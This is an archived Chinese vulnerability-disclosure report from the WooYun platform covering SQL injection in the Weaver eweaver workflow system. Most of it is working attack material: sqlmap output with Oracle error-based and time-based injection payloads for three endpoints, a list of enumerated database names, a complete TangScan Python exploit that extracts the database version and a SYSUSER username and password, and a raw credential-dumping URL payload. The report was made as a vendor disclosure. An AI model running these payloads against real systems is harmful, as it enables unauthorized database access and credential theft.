乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-12: 细节已通知厂商并且等待厂商处理中 2015-09-14: 厂商已经确认,细节仅向厂商公开 2015-09-17: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-11-08: 细节向核心白帽子及相关领域专家公开 2015-11-18: 细节向普通白帽子公开 2015-11-28: 细节向实习白帽子公开 2015-12-13: 细节向公众公开
一个一个文件翻看太麻烦了三处官网为例
第一处:缺陷文件/mobile/plugin/loadWfGraph.jsphttp://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1*
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 3708=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(113)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (3708=3708) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(122)||CHR(111)||CHR(113)||CHR(62))) FROM DUAL) AND 'IhpV'='IhpV Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 5058=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(121)||CHR(68)||CHR(104),5) AND 'IXww'='IXww---[16:30:43] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle
数据库
available databases [37]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EWEAVER[*] EWEAVER5TEST[*] EWEAVERINHOUSE[*] EWEAVERTEST[*] EXFSYS[*] FTOA01[*] FTPOM[*] HR[*] HTF[*] IX[*] MDSYS[*] MOBILEDEMO[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] PMECOLOGY[*] POWER[*] POWER01[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WEAVERIM[*] WFPM[*] WMSYS[*] XDB[*] ZTDBA[*] ZTKG[*] ZZB[*] ZZBMIS3
第二处http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 109 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1' AND 2569=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(101)||CHR(116)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (2569=2569) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(119)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'noSD'='noSD Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1' AND 6418=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(72)||CHR(65)||CHR(108),5) AND 'mcMO'='mcMO---
第三处http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2*
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 53 HTTP(s) requests:---Place: URIParameter: #1* Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2' AND 9830=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(100)||CHR(97)||CHR(104)||CHR(113)||(SELECT (CASE WHEN (9830=9830) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(111)||CHR(109)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'ByUc'='ByUc Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2' AND 3045=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(82)||CHR(119)||CHR(114),5) AND 'dOdb'='dOdb---[16:37:44] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle
一个一个验证太慢了这里使用tangscan脚本
#! /usr/bin/env python# -*- coding: utf-8 -*-"""Copyright (c) 2013-2014 TangScan developers (http://**.**.**.**/)See the file 'docs/COPYING' for copying permissionauthor: 浮萍 <fate0@**.**.**.**>"""import refrom thirdparty import requestsfrom modules.exploit import TSExploit__all__ = ['TangScan']class TangScan(TSExploit): def __init__(self): super(self.__class__, self).__init__() self.info = { "name": "泛微eweaver系统SQL注入检测1", "product": "weaver", "product_version": "", "desc": "", "license": self.license.TS, "author": "浮萍", "ref": [ {self.ref.wooyun: "**.**.**.**"}, ], "type": self.type.injection, "severity": self.severity.high, "privileged": False, "disclosure_date": "", "create_date": "", } self.register_option({ "url": { "default": "", "required": True, "choices": [], "convert": self.convert.url_field, "desc": "目标 url" } }) self.register_result({ "status": False, "data": { "user_info": { "username": "", "password": "" }, "db_info": { "version": "", } }, "description": "", "error": "" }) def verify(self): self.print_debug("verify start") re_version_pattern = **.**.**.**pile(r'qaflq(.+?)qaflq', re.IGNORECASE | re.DOTALL | re.MULTILINE) cookies = {'cookie': 'admin'} exp_url = ("{domain}/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 9945=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(Banner AS VARCHAR(4000)),CHR(32)) FROM v$version WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113))) FROM DUAL) AND 'jsWv'='jsWv".format(domain=self.option.url)) try: response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False) except Exception, e: self.result.error = str(e) return re_result = re_version_pattern.findall(response.content) if len(re_result) == 0: self.result.status = False return self.result.status = True ls_result = re_result[0] ls_result = ls_result.replace('quq',' ') self.result.data.db_info.version = ls_result self.result.description = "目标 {url} 存在sql注入, 目标使用数据库版本为: {db_version}".format( url=self.option.url, db_version=ls_result ) def exploit(self): self.print_debug("exploit start") re_userinfo_pattern = **.**.**.**pile(r'qaflq(\w+?)\quq(\w+?)qaflq', re.IGNORECASE | re.DOTALL | re.MULTILINE) cookies = {'cookie': 'admin'} exp_url = ("{domain}/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 2341=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(concat(LONGONNAME||CHR(113)||CHR(117)||CHR(113),LOGONPASS) AS VARCHAR(4000)),CHR(32)) FROM SYSUSER WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL) AND 'tJNI'='tJNI".format(domain=self.option.url)) try: response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False) except Exception, e: self.result.error = str(e) return re_result = re_userinfo_pattern.findall(response.content) if len(re_result) == 0: self.result.status = False return self.result.status = True self.result.data.user_info.username = re_result[0][0] self.result.data.user_info.password = re_result[0][1] self.result.description = "目标 {url} 存在sql注入, 其中一个用户: {username}, 密码: {password}".format( url=self.option.url, username=self.result.data.user_info.username, password=self.result.data.user_info.password )if __name__ == '__main__': from modules.main import main main(TangScan())
第二处和第三处类似只需更改exp_url即可案例1http://**.**.**.**
案例2http://**.**.**.**/
案例3http://**.**.**.**
PoC可能有点问题在获取用户名密码的时候会出错
http://**.**.**.**//mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 2341=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(concat(LONGONNAME||CHR(113)||CHR(117)||CHR(113),LOGONPASS) AS VARCHAR(4000)),CHR(32)) FROM SYSUSER WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL) AND 'tJNI'='tJNI#
乱码请无视
危害等级:高
漏洞Rank:13
确认时间:2015-09-14 23:05
CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。
暂无